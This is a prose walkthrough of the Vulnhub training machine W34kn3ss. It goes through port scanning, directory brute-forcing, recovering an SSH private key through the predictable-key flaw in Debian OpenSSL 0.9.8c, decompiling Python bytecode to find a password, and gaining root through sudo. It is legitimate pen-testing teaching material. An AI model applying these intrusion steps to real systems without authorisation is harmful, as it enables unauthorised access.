W34kn3ss:1 vulnhub walkthrough
Hello friends. Today I will share with you another writeup for Vulnhub vulnerable machines. The selected target will be W34kn3ss. You can download it from the following link : https://download.vulnhub.com/w34kn3ss/W34KN3SS.ova
In this article you will learn the following:
- Using nmap to find opened ports & running services.
- Analyzing the SSL certificate to get the domains related to it.
- Editing the hosts file (local domain lockup).
- Brute-forcing web directories using dirb tool.
- Searching for public exploits using searchsploit.
- Login to SSH service using private key.
- De-compile python compiled byte file.
- Get root using the sudo command.
After downloading and importing the OVA file to your virtualization software you can power it on and start hacking.
The first thing to do is getting the IP address of my target using nmap ping scan over the whole subnet. This gives me that the IP address is : 10.0.2.19
After that, I start scanning this IP address for all open ports & running services and I got that there are only 3 opened ports and running services on the target (port 22 for SSH, port 80 for HTTP, and port 443 for HTTPS).
I checked port 80 by browsing it using firefox, I found the default page for Apache server and there is not robots.txt file in the home directory. So, I decided to check the 443 port (HTTPS), when I browse it I checked the SSL certificate and I found that it signed for weakness.htb domain. So, I decided to add the IP address and domain (10.0.2.19 & weakness.htb) to my hosts file in Kali Linux.
After that, I start browsing the domain weakness.htb on port 80 (HTTP service) but I did not find anything. So, I tried to brute-force the directories. I used dirb to this time with the default settings and I found that there is a directory called Private .
By browsing this directory, I found that it contains two files (mykey.pub and notes.txt).
The first file (mykey.pub) is a public key, but we need to find the private key to use it to login into the server using the SSH service. So, I check the second file. It contains a hint. The hint tells me that the key generated using openssl version 0.9.8c-1.
Using searchsploit to search for public exploits, I found that this version of openssl vulnerable and there is an available exploit for it.
Actually, I did not follow all steps in this exploit. I followed only the first two steps. So, I downloaded the tar file and untar it.
Then, I used the grep command to search for the file that contains the content of the “mykey.pub”. I found that the file name is “4161de56829de2fe64b9055711f531c1-2537.pub”. This is the public key, so removing the extension of this file which is “.pub” gives me the private key which related to this public key.
I used the private key to login using the SSH service to my target and I succeeded. (by the way, the username “n30” found during the enumeration of the web application).
After reading the “user.txt” file I found that the home directoy for n30 user contains an executable file called code. Using the strings command, I found that this is a byte-compiled file for python script. There are many online websites and tools that can be used to de-compile this file. After de-compiling it, I found that it contains the password for n30 user.
I used the password to list the commands that n30 user can execute as root and I got that he can run all commands as root.
I hope you enjoyed and learn new thing in pen-testing field. If you have an question or comments, please write them down in the comments and wait for the next writeup 😀